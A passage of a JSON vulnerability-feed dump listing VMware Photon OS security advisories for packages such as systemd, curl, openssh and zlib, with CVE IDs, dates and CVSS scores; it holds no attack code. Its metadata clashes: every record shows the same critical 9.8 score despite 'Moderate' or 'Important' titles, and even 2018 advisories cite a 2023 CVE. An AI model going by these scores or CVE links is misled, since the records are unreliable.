"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32574", "CVE-2023-34060"], "modified": "2021-08-04T00:00:00", "id": "PHSA-2021-3.0-0279", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-279", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:19:13", "description": "Updates of ['systemd'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-07-23T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2021-3.0-0272", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13529", "CVE-2023-34060"], "modified": "2021-07-23T00:00:00", "id": "PHSA-2021-3.0-0272", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-272", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T22:07:33", "description": "Updates of ['openldap'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-12-17T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2020-0349", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25692", "CVE-2023-34060"], "modified": "2020-12-17T00:00:00", "id": "PHSA-2020-0349", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-349", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T22:04:38", "description": "Updates of ['linux', 'linux-esx'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-06-07T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2020-0299", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5995", "CVE-2023-34060"], "modified": "2020-06-07T00:00:00", "id": "PHSA-2020-0299", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-299", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:43:39", "description": "Updates of ['runc'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-08-22T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2020-0275", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19921", "CVE-2023-34060"], "modified": "2020-08-22T00:00:00", "id": "PHSA-2020-0275", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-275", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:32:29", "description": "Updates of ['libxml2'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-09-08T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-0514", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2309", "CVE-2023-34060"], "modified": "2022-09-08T00:00:00", "id": "PHSA-2022-0514", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-514", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:32:45", "description": "Updates of ['zlib'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-17T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2022-0508", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-37434", "CVE-2023-34060"], "modified": "2022-08-17T00:00:00", "id": "PHSA-2022-0508", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-508", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:48:57", "description": "Updates of ['python3'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2019-09-23T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2019-0176", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16056", "CVE-2023-34060"], "modified": "2019-09-23T00:00:00", "id": "PHSA-2019-0176", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-176", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:49:28", "description": "Updates of ['systemd'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2019-06-21T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2019-0166", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6954", "CVE-2023-34060"], "modified": "2019-06-21T00:00:00", "id": "PHSA-2019-0166", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-166", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T22:10:28", "description": "Updates of ['httpd'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2018-09-05T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2018-0181", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1333", "CVE-2023-34060"], "modified": "2018-09-05T00:00:00", "id": "PHSA-2018-0181", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-181", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T00:25:39", "description": "Updates of ['python2'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-07-05T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2022-0492", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000802", "CVE-2023-34060"], "modified": "2022-07-05T00:00:00", "id": "PHSA-2022-0492", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-492", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T00:56:09", "description": "Updates of ['curl'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-08-20T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2020-0315", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8231", "CVE-2023-34060"], "modified": "2020-08-20T00:00:00", "id": "PHSA-2020-0315", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-315", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T00:59:46", "description": "Updates of ['apache-tomcat'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2019-07-19T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2019-0244", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10072", "CVE-2023-34060"], "modified": "2019-07-19T00:00:00", "id": "PHSA-2019-0244", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-244", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T00:38:53", "description": "Updates of ['PyYAML'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-03-08T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2020-0217", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20477", "CVE-2023-34060"], "modified": "2020-03-08T00:00:00", "id": "PHSA-2020-0217", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-217", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T00:37:10", "description": "Updates of ['git'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-05-14T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2020-0243", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11008", "CVE-2023-34060"], "modified": "2020-05-14T00:00:00", "id": "PHSA-2020-0243", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-243", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T02:57:23", "description": "Updates of ['go'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-10-17T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2023-3.0-0670", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-34060", "CVE-2023-39323"], "modified": "2023-10-17T00:00:00", "id": "PHSA-2023-3.0-0670", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-670", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T02:56:46", "description": "Updates of ['traceroute'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-11-05T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2023-3.0-0682", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-34060", "CVE-2023-46316"], "modified": "2023-11-05T00:00:00", "id": "PHSA-2023-3.0-0682", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-682", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T02:52:36", "description": "Updates of ['util-linux'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-08-17T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2021-4.0-0081", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37600", "CVE-2023-34060"], "modified": "2021-08-17T00:00:00", "id": "PHSA-2021-4.0-0081", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-81", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T02:55:50", "description": "Updates of ['tar'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-04-15T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2021-4.0-0010", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20193", "CVE-2023-34060"], "modified": "2021-04-15T00:00:00", "id": "PHSA-2021-4.0-0010", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-10", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T03:11:31", "description": "Updates of ['openssh'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-10-15T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-3.0-0313", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41617", "CVE-2023-34060"], "modified": "2021-10-15T00:00:00", "id": "PHSA-2021-3.0-0313", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-313", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T03:12:08", "description": "Updates of ['libgd'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-09-14T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-3.0-0298", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40145", "CVE-2023-34060"], "modified": "2021-09-14T00:00:00", "id": "PHSA-2021-3.0-0298", "href": 